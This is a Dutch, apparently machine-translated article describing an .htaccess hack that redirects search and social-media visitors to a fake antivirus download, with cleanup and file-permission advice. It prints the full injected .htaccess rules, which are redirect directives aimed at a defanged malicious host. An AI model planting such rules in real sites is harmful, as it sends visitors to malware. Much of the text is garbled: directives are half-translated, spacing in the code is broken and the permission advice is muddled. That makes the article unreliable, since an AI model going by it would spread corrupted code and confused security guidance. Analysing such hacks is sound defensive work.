Een nieuwe vorm van virus die zien dat niet weten erg veel invloed op websites gehost op onbetrouwbare servers waar gebruikersaccounts / subdomeinaccounts ertussen kunnen worden "gezien". Concreet worden de hostingaccounts allemaal in de map "vhosts“, En het schrijfrecht van gebruikersmap van "vhosts" wordt in de meeste situaties aan een algemene gebruiker gegeven ... door de wederverkoper. Het is een typische methode van webservers die geen gebruik maken van WHM / cPanel.
Inhoud
.Htaccess-virusactie - .htaccess-hack
Virus invloed op bestanden .htaccess het slachtoffer site. Lijnen worden toegevoegd / Richtlijnen naar redirect bezoekers (afkomstig zijn van yahoo, msn, google, facebook, yaindex, twitter, myspace, etc. sites en portals met veel verkeer) naar sommige sites die "antivirus“. Het gaat over nep antivirus, Waarover ik schreef in de inleiding van Fake Antivirus Remover.
Hier is wat het lijkt op een .htaccess beïnvloed: (niet onder toegang tot de inhoud URLs lijnen)
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3RewriteEngine On
RewriteCond% {HTTP_REFERER}. * Yandex. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Odnoklassniki. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Vkontakte. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Rambler. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Tube. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Wikipedia. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Blogger. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Baidu. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Qq.com. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Myspace. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Twitter. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Facebook. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Google. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Live. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Aol. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Bing. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Amazon. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ebay. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LinkedIn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Flickr. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJasmin. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Soso. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * DoubleClick. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Pornhub. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Orkut. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * LiveJournal. * $ [NC, OR]
HerschrijfCond% {HTTP_REFERER}. *wordpress* $ [NC, OF]
RewriteCond% {HTTP_REFERER}. * Yahoo. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ask. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Excite. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Altavista. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Msn. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Netscape. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Hotbot. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Ga naar. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Infoseek. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Mama. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Alltheweb. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Lycos. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Zoeken. * $ [NC, OR]
Herschrijfvoorwaarde %{HTTP_REFERER} .*metacrawler.*$ [NC,OF]
RewriteCond% {HTTP_REFERER}. * Mail. * $ [NC, OR]
RewriteCond% {HTTP_REFERER}. * Dogpile. * $ [NC]RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = r [R, L]REQUEST_FILENAME RewriteCond% {}! -f
REQUEST_FILENAME RewriteCond% {}! -d
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond% {HTTP_USER_AGENT}. *Windows.*
RewriteRule. * Hxxp: //wwww.peoriavascularsurgery.com/main.php? H =% {HTTP_HOST} & i = J8iiidsar / qmiRj7V8NOyJoXpA == & e = 4 [R, L]
Degenen die WordPress ze zullen deze regels in het bestand vinden .htaccess van public_html. Bovendien, het virus creëert een. Htaccess bestand in dezelfde map wp-content.
*Er zijn ook situaties waarbij in plaats verschijnt peoriavascularsurgery.com dns.thesoulfoodcafe.com of andere adressen.
Wat maakt dit virus.
Eenmaal doorgestuurd, wordt de bezoeker begroet met open armen ontvangen door het bericht:
Waarschuwing!
Uw computer bevat verschillende tekenen van aanwezigheid van virussen en malwareprogramma's. uw system vereist onmiddellijke antiviruscontrole!
System Beveiliging voert een snelle en gratis scan van uw pc uit op virussen en schadelijke programma's.
Op welke knop we ook drukken, we worden naar de pagina geleid "Deze computer", Gemaakt om te imiteren XP ontwerp. Dit is waar het "scanproces" automatisch start, aan het einde waarvan we ontdekken dat "we besmet zijn".
Nadat u op OK klikt of Annuleren, begint DownloadFile's setup.exe. deze setup.exe is nep anti-virus systeem beïnvloedt. Installeer sommige malware naar gecompromitteerde verdere links propageren, en naast deze een anti-virus software (ook nep) dat het slachtoffer wordt uitgenodigd om te kopen.
Degenen die al hebben contact opgenomen met het virus kunt dit formulier gebruiken Fake Antivirus Remover. Het is ook aanbevolen om de gehele harde schijf te scannen. Adviseren Kaspersky Internet Security of Kaspersky Anti Virus.
Dit type virus treft Visitor OS besturingssystemen Windows XP, Windows ME Windows 2000, Windows NT, Windows 98 si Windows 95. Tot nu toe geen bekende gevallen van infectie van de besturingssystemen Windows Zicht ja Windows 7.
Hoe kunnen we elimineren van dit virus. Htaccess bestand op de server, en hoe om infectie te voorkomen.
1. Analyseer verdachte bestanden en wissen van codes. Om ervoor te zorgen dat het bestand niet alleen beïnvloed .htaccess moet u analyseren van alle bestanden . Php si . Js.
2. Herschrijf het bestand. Htaccess en stel de chmod 644 of 744 met schrijftoegang alleen eigenaar gebruiker.
3. Wanneer u een hosting account voor een website in de map / Home of / Webroot Dit maakt automatisch een map die vaak de naam van de gebruiker (gebruiker voor cpanel, ftpEnz.). Om het schrijven van gegevens en overbrenging van virussen van de ene gebruiker naar de andere te voorkomen, is het aanbevolen dat elke gebruiker de map in te stellen:
chmod 644 of 744, 755 – 644 is aangegeven.
chown -R gebruikersnaam mapnaam.
chgrp-R nume_user nume_folder
ls-all manieren om te controleren of ze correct zijn. Mocht zoiets als dit verschijnen:
drwx - x - x 12 dinamics dinamics 4096 6 mei 14:51 dinamics /
drwx - x - x 10 duran duran 4096 7 mrt 07:46 duran /
drwx - x - x 12 reageerbuis reageerbuis 4096 29 jan 11:23 reageerbuis /
drwxr-xr-x 14 express express 4096 26 februari 2009 express /
drwxr-xr-x 9 ezo ezo 4096 19 mei 01:09 ezo /
drwx - x - x 9 farma farma 4096 19 dec 22:29 farma /
Als een van de hierboven userele FTP Geïnfecteerde bestandenHet kan het virus niet naar een andere gebruiker host. Is een minimumvoorschriften inzake veiligheid maatregel om de rekeningen gehost op een webserver te beschermen.
Gemeenschappelijke elementen van gebieden die door dit virus.
Alle betrokken domeinen leiden bezoekers om naar sites die de domeinnaam "/main.php? s = 4 & H'.
Dit "virus. htaccess"Heeft invloed op elk type CMS (Joomla, WordPress, phpBBEnz.) met .htaccess.
.htaccess Virus Hack & Redirect.
